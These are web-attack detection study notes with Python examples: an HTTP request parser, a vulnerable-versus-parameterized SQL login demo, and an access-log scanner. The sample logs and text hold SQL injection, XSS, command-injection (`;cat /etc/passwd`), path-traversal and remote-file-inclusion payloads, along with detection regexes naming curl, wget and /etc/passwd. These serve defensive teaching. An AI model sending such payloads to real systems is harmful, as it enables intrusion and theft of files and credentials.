# Introduction

75% of cyber attacks are against web-based applications.

## What are web attacks?

Web applications provide services to users via a browser interface. Web apps can be exploited to gain access to devices, steal personal data, or cause service disruptions.

Attack Methods

- SQL Injection
- Cross Site Scripting
- Command Injection
- IDOR
- RFI & LFI
- File Upload (Web Shell)

# Why Detecting Web Attacks is Important

Most people use a variety of web applications regularly, such as Spotify, YouTube, and Twitter. Looking at the anatomy of an attack, the best scenario is to prevent the attack in the first place; when prevention fails, detection is what lets you respond before the attacker gets what they came for.

https://www.acunetix.com/websitesecurity/web-application-attack/

# OWASP

Open Web Application Security Project: a non-profit dedicated to improving software security.

## Top 10

A list of the most critical web application security risks, curated by OWASP and updated every few years.

https://owasp.org/www-project-top-ten/assets/images/mapping.png

2025 Version should be out before July. https://owasp.org/Top10/2025/

1. Broken Access Control
2. Security Misconfiguration
3. Software Supply Chain Failures
4. Cryptographic Failures
5. Injection
6. Insecure Design
7. Authentication Failures
8. Software or Data Integrity Failures
9. Security Logging and Alerting Failures
10. Mishandling of Exceptional Conditions

# How Web Applications Work

HTTP is an application-layer (layer 7) protocol, so Ethernet, IP, TCP, and, for HTTPS, TLS (often still called SSL) are all in use underneath before HTTP itself. The client sends an HTTP request, the server handles it and returns an HTTP response, and the browser displays the returned resource in the appropriate format.

## HTTP Requests

Used to retrieve a specific resource from a web server, such as HTML, JSON, or video. The server's job is to process the request and return the resource to the user. If a request is sent in a format outside standard HTTP, the server will either return an error or refuse to provide the service.

An HTTP request consists of:

- Request line - the HTTP method, the resource requested, and the HTTP version
- Request headers
- Request message body - data to be sent to the server

Walking through a typical browser GET request, header by header:

1. The GET method indicates that the resource "/" is being requested from the server. Because no file name is given, "/" means the main page of the web server is being requested.
2. Nowadays a single web server often hosts web applications belonging to more than one domain, so browsers send the "Host" header to identify which domain the requested resource belongs to.
3. When a web application wants to store information on the client's device, it sets a cookie (via the "Set-Cookie" response header), and the browser sends it back on later requests in the "Cookie" header. Cookies are typically used to store session information. This saves you from having to re-enter your username and password every time you visit a web application that requires you to log in.
4. The "Upgrade-Insecure-Requests" header indicates that the client prefers an encrypted (HTTPS/TLS) version of the resource and will accept a redirect to it.
5. The "User-Agent" header contains information about the client's browser and operating system. Web servers use this information to tailor HTTP responses to the client. Many automated vulnerability scanners identify themselves in this header, so it is a useful field to check.
6. The type of content the client wants is in the "Accept" header.
7. The encodings accepted by the client are in the "Accept-Encoding" header. You will usually find the names of compression algorithms (gzip, deflate, br) here.
8. The "Accept-Language" header contains the client's language preferences. The web server uses this information to serve content in the client's language if it has it.
9. The "Connection" header shows how the HTTP connection is handled. If the value is "close", the TCP connection will be closed after the HTTP response is received; "keep-alive" means the connection is kept open for further requests.
10. An empty line is inserted between the HTTP request headers and the HTTP request message body to separate them.
11. Any other data to be sent to the web application is in the request message body. If the HTTP POST method is used, the POST parameters can be found here.
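The request anatomy above, as an added example that is not part of the original notes: a minimal parser for a raw HTTP/1.1 request that splits it into request line, headers and body, extracts the Host, Cookie, Connection and POST-parameter fields discussed, and checks the User-Agent against a short, illustrative list of scanner names. The request text, host name, cookie values and credentials are constructed for the demo.

```python
# Added example (not from the original notes): a minimal parser for a raw
# HTTP/1.1 request that splits it into the three parts described above and
# pulls out the headers the notes discuss. The request text below is
# constructed for the demo; the host, cookie values and credentials are made up.
import re
from urllib.parse import parse_qs

# Constructed sample: a browser POSTing a login form. Content-Length is the
# byte length of the body ("username=admin&password=secret123" is 33 bytes).
SAMPLE_REQUEST = (
    "POST /login HTTP/1.1\r\n"
    "Host: shop.example.com\r\n"
    "Cookie: PHPSESSID=abc123; theme=dark\r\n"
    "Upgrade-Insecure-Requests: 1\r\n"
    "User-Agent: sqlmap/1.7 (https://sqlmap.org)\r\n"
    "Accept: text/html,application/xhtml+xml\r\n"
    "Accept-Encoding: gzip, deflate\r\n"
    "Accept-Language: en-US,en;q=0.9\r\n"
    "Connection: close\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 33\r\n"
    "\r\n"
    "username=admin&password=secret123"
)

# Illustrative list of scanner names that show up in User-Agent strings
# (item 5 above); extend it from your own logs.
SCANNER_UA = re.compile(r"sqlmap|nikto|wfuzz|dirbuster|acunetix|nmap", re.I)


def parse_request(raw: str) -> dict:
    """Split a raw request into request line, headers and body.

    Raises ValueError on anything that is not well-formed HTTP, which is
    exactly the case where a server would return an error instead of a page.
    """
    # Item 10: a blank line separates the head (request line + headers) from the body.
    head, blank, body = raw.partition("\r\n\r\n")
    if not blank:
        raise ValueError("malformed request: no blank line after the headers")

    lines = head.split("\r\n")
    # Item 1: request line = method, target, version.
    parts = lines[0].split(" ")
    if len(parts) != 3:
        raise ValueError(f"malformed request line: {lines[0]!r}")
    method, target, version = parts

    # Items 2-9: one "Name: value" pair per line; names are case-insensitive.
    headers = {}
    for line in lines[1:]:
        name, colon, value = line.partition(":")
        if not colon:
            raise ValueError(f"malformed header line: {line!r}")
        headers[name.strip().lower()] = value.strip()

    # Item 3: cookies travel as "name=value; name2=value2".
    cookies = {}
    for chunk in headers.get("cookie", "").split(";"):
        if "=" in chunk:
            cname, cvalue = chunk.strip().split("=", 1)
            cookies[cname] = cvalue

    # Content-Length must match what actually arrived; a truncated capture or
    # a smuggled body shows up here as a mismatch.
    declared = headers.get("content-length")
    actual = len(body.encode("utf-8"))
    if declared is not None and int(declared) != actual:
        raise ValueError(f"Content-Length {declared} does not match body of {actual} bytes")

    # Item 11: POST parameters live in the body (form encoding assumed).
    params = {k: v[0] for k, v in parse_qs(body).items()} if method == "POST" else {}

    return {
        "method": method,
        "target": target,
        "version": version,
        "headers": headers,
        "cookies": cookies,
        # Item 9: HTTP/1.1 keeps the connection open unless told to close it.
        "keep_alive": headers.get("connection", "").lower() != "close",
        "params": params,
        "body": body,
    }


def looks_automated(req: dict) -> bool:
    """Item 5: a known scanner name in User-Agent is a cheap first signal."""
    return bool(SCANNER_UA.search(req["headers"].get("user-agent", "")))


if __name__ == "__main__":
    req = parse_request(SAMPLE_REQUEST)
    print(req["method"], req["target"], "from host", req["headers"]["host"])
    print("cookies:", req["cookies"], "params:", req["params"])
    print("automated client?", looks_automated(req))
```

The parser is strict on purpose: a missing blank line or a Content-Length that does not match the body raises rather than guessing, which is the same decision a server makes when it returns an error for a non-standard request. The User-Agent check is only a first signal; scanners can set any string they like, so it never replaces looking at the request content itself.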
## HTTP Responses

The server performs the necessary checks and processing and sends the requested resource to the client. A response contains:

- status line, including a three-digit status code
  - 100-199: Informational responses
  - 200-299: Successful responses
  - 300-399: Redirection messages
  - 400-499: Client error responses
  - 500-599: Server error responses
- response headers, for example:
  - Date
  - Connection
  - Server
  - Last-Modified
  - Content-Type
  - Content-Length
- response body - the content of the requested resource

# Detecting SQL Injection Attacks

SQL injection (SQLi) is an injection attack that occurs when a web application includes unsanitized user-supplied data directly in an SQL query, so the data is interpreted as part of the query rather than as a value.

## Types of SQL Injections

1. In-Band SQLi (Classic)
   1. The payload is sent and the result is returned on the same channel (the HTTP response), for example in an error message or in page content.
2. Inferential SQLi (Blind)
   1. The query result is not visible in the response; the attacker infers it from the application's behaviour, such as a true/false difference in the page or a time delay.
3. Out-of-Band SQLi
   1. The result is communicated through a different channel, such as DNS.

## How Does It Work

The login query below is built by concatenating the user-supplied username into the SQL text. The attacker sends `' OR 1=1 -- -` as the username:

```sql
SELECT * FROM users WHERE username = '' OR 1=1 -- - AND password = 'supersecretpassword'
```

`OR 1=1` makes the WHERE clause true for every row, and `-- -` starts an SQL comment, so the password check is ignored and the query returns all users.

## What Attackers Gain

- Authentication Bypass
- Command Execution
- Exfiltration of Sensitive Data
- Creating/Deleting/Updating database entries

## How to Prevent SQLi

- Use a framework
- Keep the framework up to date
- Always sanitize data received from a user
  - ALL data, not just form data: URL parameters, headers, and cookies too
- Avoid raw SQL queries built from strings; use parameterized (prepared) queries instead

## Detecting SQLi attacks

- In a web request, check all areas that come from the user
- Look for SQL keywords
  - INSERT, SELECT, WHERE, UNION
- Check for special characters
  - ', -, (
- Familiarise yourself with commonly used SQLi payloads

## Detecting Automated SQLi Tools

- Look at the User-Agent (tools such as sqlmap identify themselves by default)
- Check the frequency of requests
- Look at payload content
  - automated tools send complicated payloads that a human is unlikely to type

### Log Breakdown

https://ld-images-2.s3.us-east-2.amazonaws.com/Detecting+Web+Attacks/images/URL-Encoding.png

Payloads in access logs are usually URL-encoded (`%27` for `'`, `%20` for a space), so decode them before searching. "Online URL Decoder" sites will decode URLs for you, but be careful uploading sensitive data like access logs to a third-party site; it is best to create or use a local parser.

# Detecting Cross Site Scripting (XSS) Attacks
XSS is an injection-based web vulnerability in which an attacker gets their own client-side script (usually JavaScript) included in a page served by a legitimate web application, so that it runs in other users' browsers. It is still seen because frameworks are occasionally not used, the framework itself has an XSS vulnerability, or user data has not been sanitized.

## Types of XSS

1. Reflected XSS (non-persistent)
   1. The payload must be present in the request and is reflected straight back in the response. Most common; not persistent.
2. Stored XSS (persistent)
   1. The attacker permanently stores the XSS payload in the web application (for example in a comment or profile field), and it is served to every user who views it. Most dangerous; persistent.
3. DOM Based XSS
   1. The payload is executed as a result of the original client-side script modifying the DOM environment in the victim's browser, so that the script runs in an unexpected manner. The payload may never reach the server.

## How Does XSS Work?

When whatever is put in an unsanitized parameter is included in an HTTP response, the attacker controls part of that response. Because the response is HTML that the victim's browser renders, the attacker can add script to it, and the browser runs that script with the victim's session.

## How Attackers Take Advantage

- Steal the user's session information (cookies)
- Capture credentials

## How to Prevent an XSS Vulnerability

- Sanitize (and output-encode) data coming from the user
- Use a framework
- Use the framework correctly
- Keep your framework up-to-date

## Detecting XSS Attacks

- Look for keywords
  - alert, script
- Learn commonly used XSS payloads
  - https://github.com/payloadbox/xss-payload-list
- Check for use of special characters
  - < or > coming from users are typical markers

# Command Injection Attacks

## What are Command Injection Attacks

Command injection occurs when data received from a user is not sanitized and is passed directly to the operating system shell. Attackers exploit command injection vulnerabilities to execute commands directly on the victim operating system, with the privileges of the web application process.

## How to Prevent Command Injection

- Always sanitize user data
- Limit user privileges: run the web application as a low-privilege account so an injected command cannot do much
- Use virtualization technologies like Docker containers to contain the impact

## Detecting Command Injection Attacks

- Look in all areas of the web request
- Look for terminal-related keywords
  - dir, ls, cp, cat, type
- Look for shell separators such as ;, |, and backticks that chain an extra command onto the expected one
- Learn commonly used command injection payloads

# Detecting Insecure Direct Object Reference (IDOR) Attacks

Insecure Direct Object Reference is caused by the absence or improper use of an authorization mechanism. It allows a user to access an object that belongs to another user.

## How IDOR Works

IDOR is not a vulnerability caused by poor sanitization like the other web app vulnerabilities above. By manipulating parameters sent to a web app (typically an object ID), the attacker gains access to an object that belongs to someone else and is then able to read, modify, or delete its contents. If the application does not check that the object being requested belongs to the person making the request, this is an IDOR vulnerability.

## How Attackers Take Advantage of IDOR

- Steal personal information
- Access unauthorized documents
- Take unauthorized actions
  - delete, modify

## How to Prevent IDOR

Make sure the person making a request is authorized to access the object they are requesting, on every request. Minimize the parameters requested from the user; where possible, take the user's identity from the server-side session rather than from a client-supplied ID.

## How to Detect IDOR Attacks

- Check all parameters
- Look at the number of requests made to the same page
  - when an IDOR vuln is found, it is typically followed by a brute-force attack
- Find the pattern
  - attackers brute-force the parameter (for example, sequential IDs) to reach all accessible objects

# Detecting RFI and LFI Attacks

LFI is Local File Inclusion, which occurs when a file is included without sanitizing the data obtained from a user. The included file is located on the same web server that the web app is hosted on.

RFI is Remote File Inclusion, and is the same as LFI, with the key difference that the included file is hosted on another server, typically one the attacker controls.

## Attackers use RFI and LFI to

- Execute code
- Disclose sensitive information
- Cause denial of service

## How to Prevent LFI and RFI

- Make sure all data received from the user is sanitized
- Client-side controls are easily bypassed, so make sure controls are on both the client and the server side

## Detecting LFI and RFI Attacks

- When examining a user's web request, examine all fields
- Look for special characters
  - / . , \ (especially the ../ path-traversal sequence)
- Become familiar with files commonly used in LFI attacks (for example /etc/passwd)
- Look for URL schemes like http:// and https:// inside parameters
  - attackers usually set up web servers to host their files, which are then served via HTTP/HTTPS
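Returning to the SQL injection query shown in the "How Does It Work" section above, as an added example that is not part of the original notes: the same login query run two ways against an in-memory SQLite database, once built by string concatenation (vulnerable, as in the notes) and once as a parameterized query (the "avoid raw SQL" prevention advice). The users table, the credentials and the `make_db`/`login_*` helper names are constructed for the demo.

```python
# Added example (not from the original notes): the login query from the
# "How Does It Work" section run two ways against an in-memory SQLite
# database, once built by string concatenation (vulnerable) and once as a
# parameterized query. The users table and credentials are constructed for
# the demo.
import sqlite3

PAYLOAD = "' OR 1=1 -- -"   # the username the attacker submits


def make_db() -> sqlite3.Connection:
    """Constructed demo database with two users."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users (username, password) VALUES (?, ?)",
        [("alice", "supersecretpassword"), ("bob", "hunter2")])
    conn.commit()
    return conn


def build_vulnerable_query(username: str, password: str) -> str:
    """User input is pasted into the SQL text, so it can change the query's shape."""
    return (f"SELECT username FROM users WHERE username = '{username}' "
            f"AND password = '{password}'")


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> list:
    """Returns the usernames the query matches; a non-empty list means 'logged in'.
    With PAYLOAD as the username, OR 1=1 is true for every row and the
    `-- -` comment swallows the password check, so every user comes back."""
    rows = conn.execute(build_vulnerable_query(username, password)).fetchall()
    return [row[0] for row in rows]


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> list:
    """Parameterized: the query shape is fixed and the values are bound
    separately, so the quote and comment in the payload are just characters
    in a string being compared against the username column."""
    rows = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password)).fetchall()
    return [row[0] for row in rows]


if __name__ == "__main__":
    db = make_db()
    print(build_vulnerable_query(PAYLOAD, "wrong"))
    print("vulnerable:", login_vulnerable(db, PAYLOAD, "wrong"))
    print("safe:      ", login_safe(db, PAYLOAD, "wrong"))
    print("safe, real credentials:", login_safe(db, "alice", "supersecretpassword"))
```

The printed vulnerable query is exactly the string from the notes (with `username` in place of `*`), which is why an injection-aware reviewer looks for f-strings and `+` around SQL text in code review, and for `'` and `--` in request parameters in logs: the same defect shows up at both ends.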
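The detection rules from the SQLi, XSS, command injection, IDOR and LFI/RFI sections above, applied together, as an added example that is not part of the original notes: a small access-log scanner for lines in the common/combined log format. It URL-decodes each request target locally (the "use a local parser" advice from the Log Breakdown section), runs one keyword/special-character signature per attack class, flags scanner User-Agents, and spots the IDOR brute-force pattern of one client walking a numeric id on the same page. All log lines, IP addresses (documentation ranges), paths and the `RULES`/`scan` helper names are constructed for the demo.

```python
# Added example (not from the original notes): a small access-log scanner that
# applies the detection rules from the SQLi, XSS, command injection, IDOR and
# LFI/RFI sections above to lines in the common/combined log format.
# All log lines, IPs and paths below are constructed for the demo.
import re
from collections import defaultdict
from urllib.parse import unquote_plus

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>\S+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$')

# One signature per attack class, following the keyword/special-character
# hints in the notes. Word boundaries stop "select" matching "selection".
RULES = {
    "sqli": re.compile(r"'|--|/\*|\b(union|select|insert|update|delete|where)\b"
                       r"|\bor\b\s+\d+\s*=\s*\d+|\bsleep\s*\(", re.I),
    "xss":  re.compile(r"<script|</script|\balert\s*\(|on(error|load)\s*=|javascript:|[<>]", re.I),
    # a shell separator followed by a command name, or command substitution
    "cmdi": re.compile(r"(?:[;|`\n]|\$\()\s*(?:cat|ls|dir|type|cp|whoami|uname|wget|curl)\b"
                       r"|`|\$\(", re.I),
    "lfi":  re.compile(r"\.\./|\.\.\\|/etc/passwd|/proc/self|boot\.ini|win\.ini|\x00", re.I),
    "rfi":  re.compile(r"=\s*(?:https?|ftp)://", re.I),
}
SCANNER_UA = re.compile(r"sqlmap|nikto|wfuzz|dirbuster|acunetix|nmap", re.I)
# "id=", "user_id=", "orderId=" ... followed by a number
ID_PARAM = re.compile(r"[?&]\w*id\w*=(\d+)", re.I)


def decode(target: str) -> str:
    """URL-decode until the text stops changing (max 3 rounds) so that
    double-encoded payloads such as %2527 are seen as the quote they are."""
    for _ in range(3):
        decoded = unquote_plus(target)
        if decoded == target:
            break
        target = decoded
    return target


def classify(line: str):
    """Parse one log line and return a record with the rule hits, or None
    if the line is not in the expected format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["decoded"] = decode(rec["target"])
    rec["hits"] = [name for name, rx in RULES.items() if rx.search(rec["decoded"])]
    rec["scanner"] = bool(SCANNER_UA.search(rec["ua"]))
    return rec


def find_enumeration(records, threshold: int = 5) -> dict:
    """IDOR brute force: the same client requesting the same path while an
    id-like parameter takes at least `threshold` distinct numeric values."""
    seen = defaultdict(set)
    for rec in records:
        path = rec["decoded"].split("?", 1)[0]
        for value in ID_PARAM.findall(rec["decoded"]):
            seen[(rec["ip"], path)].add(int(value))
    return {key: sorted(ids) for key, ids in seen.items() if len(ids) >= threshold}


def scan(lines, threshold: int = 5) -> dict:
    """Run every rule over the log and return what a responder wants first."""
    records = [rec for rec in map(classify, lines) if rec]
    flagged = [{"ip": r["ip"], "target": r["decoded"], "hits": r["hits"], "scanner": r["scanner"]}
               for r in records if r["hits"] or r["scanner"]]
    return {"flagged": flagged, "enumeration": find_enumeration(records, threshold)}


# Constructed sample log: one benign hit, five attack probes from one
# address, and an id walk from another.
SAMPLE_LOG = [
    '10.0.0.5 - - [12/May/2024:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [12/May/2024:10:00:02 +0000] "GET /login?user=%27%20OR%201%3D1%20--%20-&pass=x HTTP/1.1" 200 2048 "-" "sqlmap/1.7 (https://sqlmap.org)"',
    '203.0.113.7 - - [12/May/2024:10:00:03 +0000] "GET /search?q=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [12/May/2024:10:00:04 +0000] "GET /ping?host=127.0.0.1;cat%20/etc/passwd HTTP/1.1" 200 300 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [12/May/2024:10:00:05 +0000] "GET /page?file=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 300 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [12/May/2024:10:00:06 +0000] "GET /page?file=http://203.0.113.7/shell.txt HTTP/1.1" 200 300 "-" "Mozilla/5.0"',
] + [
    f'198.51.100.9 - - [12/May/2024:10:01:{i:02d} +0000] "GET /invoice?id={1000 + i} HTTP/1.1" 200 700 "-" "Mozilla/5.0"'
    for i in range(1, 7)
]

if __name__ == "__main__":
    report = scan(SAMPLE_LOG)
    for hit in report["flagged"]:
        print(hit["ip"], hit["hits"], "scanner" if hit["scanner"] else "", hit["target"])
    for (ip, path), ids in report["enumeration"].items():
        print(f"possible IDOR enumeration: {ip} walked {path} ids {ids[0]}..{ids[-1]} ({len(ids)} values)")
```

Two deliberate choices: the bare `(` that the notes list as an SQLi marker is left out of the `sqli` rule because it fires on every `alert(1)` and on ordinary search strings, and the command-injection rule requires a shell separator before the command name so that `?type=json` is not reported as `type`. Even so, a search for `O'Brien` trips the quote rule, so treat hits as triage input, not verdicts, and tune the enumeration threshold to the page (an invoice list legitimately fetches many ids). Only the request target is inspected here; in real logs also look at the headers and POST bodies when you have them, since the notes stress that every user-controlled field is an injection point.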